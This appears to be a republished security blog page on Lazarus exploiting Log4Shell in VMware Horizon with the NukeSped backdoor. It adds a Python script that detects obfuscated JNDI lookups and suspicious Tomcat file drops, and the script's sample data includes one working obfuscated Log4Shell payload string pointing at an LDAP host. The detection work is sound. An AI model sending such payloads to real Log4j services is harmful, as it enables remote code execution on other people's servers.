vurcompare.blogg.se

Miners to infect VMware Horizon servers

State-run threat actor Lazarus rides again, this time exploiting the notorious Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon servers. In this campaign, the adversaries use Horizon as the entry point, targeting the Republic of Korea with the NukeSped backdoor. The first documented exploits date back to January 2022, and Lazarus operators have been spotted exploiting Log4Shell in VMware Horizon products since mid-spring 2022. Almost half a year later, these exploits still remain a burning issue.

NukeSped Malware Analysis

Leverage a new Sigma rule by keen Threat Bounty developer Sohan G, released in the Threat Detection Marketplace repository of SOC Prime's platform. The rule enables detection of possible malicious activity associated with NukeSped malware:

Possible Detection of Lazarus Group Exploiting Log4Shell Vulnerability (NukeSped) (via file_event)

The detection is available for 20 SIEM, EDR & XDR platforms, aligned with the latest MITRE ATT&CK® framework v.10, addressing the Execution tactic with Command and Scripting Interpreter (T1059) as the main technique.

Hit the View Detections button to browse a rich library of detection content. The world's leading Detection as Code platform has aggregated 185K+ detection algorithms and threat hunting queries for multiple security platforms. Eager to develop your own Sigma rules, increase your threat hunting velocity, and contribute to global threat hunting initiatives? Join our Threat Bounty Program!
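The post names a file_event Sigma rule but does not reproduce its logic, so the following is an added example of our own, not the Threat Bounty rule or anything from SOC Prime or VMware. It shows the two checks a hunter typically stacks for this campaign: de-obfuscating Log4j lookup syntax in inbound request fields so a hidden ${jndi:...} payload surfaces, and flagging the Horizon Connection Server's Tomcat process when it writes an executable or script to disk. It assumes that process is named ws_TomcatService.exe; the event dictionaries are constructed sample telemetry, not real logs.

```python
"""Toy detections for Log4Shell exploitation of VMware Horizon Connection Servers.

Added example: this is NOT the SOC Prime / Threat Bounty Sigma rule from the post,
whose logic is not reproduced here. The sample events below are constructed.
Assumption: ws_TomcatService.exe is the Horizon Connection Server's Tomcat process.
"""
import re

# Log4j lookup forms used to hide the "jndi" keyword from naive string matching:
#   ${lower:J} / ${upper:j}  -> the wrapped character (case fixed up later)
#   ${::-j}, ${env:NOPE:-j}  -> the default value after ":-"
_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}|\$\{[^}$]*:-([^}$]*)\}", re.IGNORECASE)

# After normalization a payload looks like ${jndi:<scheme>://host/...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)

HORIZON_TOMCAT = {"ws_tomcatservice.exe"}  # assumption, see module docstring
DROPPED_TYPES = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".jsp")


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested Log4j lookups inside-out until the string stops changing.

    "${${lower:j}${::-n}di:ldap://x}" -> "${jndi:ldap://x}"
    """
    for _ in range(max_rounds):
        new = _LOOKUP.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if new == text:
            break
        text = new
    return text


def jndi_scheme(field: str):
    """Return the JNDI scheme ("ldap", "rmi", ...) if the field carries a Log4Shell payload."""
    m = _JNDI.search(normalize_lookups(field))
    return m.group(1).lower() if m else None


def suspicious_file_event(ev: dict) -> bool:
    """file_event heuristic: the Horizon Tomcat process writes an executable or script.

    Tomcat legitimately writes compiled JSPs (.class/.java) to its work directory,
    so those are not flagged; tune DROPPED_TYPES for your estate.
    """
    image = ev.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    target = ev.get("TargetFilename", "").lower()
    return image in HORIZON_TOMCAT and target.endswith(DROPPED_TYPES)


def scan(events):
    """Run both heuristics over a list of events; return (index, reason) alerts."""
    alerts = []
    for i, ev in enumerate(events):
        if ev.get("type") == "http":
            for field in ("uri", "user_agent", "x_forwarded_for"):
                scheme = jndi_scheme(ev.get(field, ""))
                if scheme:
                    alerts.append((i, f"log4shell payload in {field} ({scheme})"))
                    break
        elif ev.get("type") == "file_event" and suspicious_file_event(ev):
            alerts.append((i, "horizon tomcat wrote " + ev["TargetFilename"]))
    return alerts


# Constructed sample telemetry (not from any real incident).
SAMPLE_EVENTS = [
    {"type": "http", "uri": "/broker/xml",
     "user_agent": "${${lower:j}${::-n}di:ldap://198.51.100.7:1389/o}"},
    {"type": "http", "uri": "/portal/", "user_agent": "Mozilla/5.0 VMware-Horizon"},
    {"type": "file_event",
     "Image": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "TargetFilename": r"C:\Windows\Temp\svchost.exe"},
    {"type": "file_event",
     "Image": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "TargetFilename": r"C:\Program Files\VMware\VMware View\Server\broker\work\xml_jsp.class"},
    {"type": "file_event", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\setup.exe"},
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

The lookup normalizer is the part worth keeping: a rule that only greps for the literal string "jndi" misses every obfuscated variant, whereas resolving ${lower:}, ${upper:} and ":-" defaults first makes the match robust. The file_event check is deliberately narrow (parent process plus dropped file type) so it stays quiet on a healthy Connection Server.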